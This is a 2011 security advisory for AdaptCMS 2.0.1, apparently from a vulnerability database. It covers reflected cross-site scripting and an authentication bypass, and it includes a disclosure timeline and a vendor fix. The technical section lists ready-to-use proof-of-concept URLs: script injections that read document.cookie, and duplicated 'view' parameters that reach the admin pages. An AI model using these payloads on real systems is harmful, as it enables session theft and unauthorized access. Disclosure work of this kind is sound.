AdaptCMS 2.0.1 Multiple security vulnerabilities

2011-09-26T00:00:00
ID SECURITYVULNS:DOC:27066
Type securityvulns
Reporter Securityvulns
Modified 2011-09-26T00:00:00

Description

Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities Advisory ID: SSCHADV2011-018 Author: Stefan Schurtz Affected Software: Successfully tested on AdaptCMS 2.0.1 Vendor URL: http://www.adaptcms.com/ Vendor Status: fixed CVE-ID: -

========================== Vulnerability Description: ==========================

AdaptCMS 2.0.1 is prone to multiple security vulnerabilities

================== Technical Details: ==================

Cross-site Scripting

http://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script> http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>

Authentication bypass / Information Disclosure

http://<target>/AdaptCMS/admin.php?view=/&view=settings http://<target>/AdaptCMS/admin.php?view=/&view=users http://<target>/AdaptCMS/admin.php?view=/&view=groups http://<target>/AdaptCMS/admin.php?view=/&view=levels http://<target>/AdaptCMS/admin.php?view=/&view=stats

========= Solution: =========

"Get the latest AdaptCMS Files" from the admin area

==================== Disclosure Timeline: ====================

24-Sep-2011 - informed developers 24-Sep-2011 - Release date of this security advisory 25-Sep-2011 - fixed by vendor 25-Sep-2011 - post on BugTraq

======== Credits: ========

Vulnerabilities found and advisory written by Stefan Schurtz.

=========== References: ===========

http://www.adaptcms.com/ http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole http://www.rul3z.de/advisories/SSCHADV2011-018.txt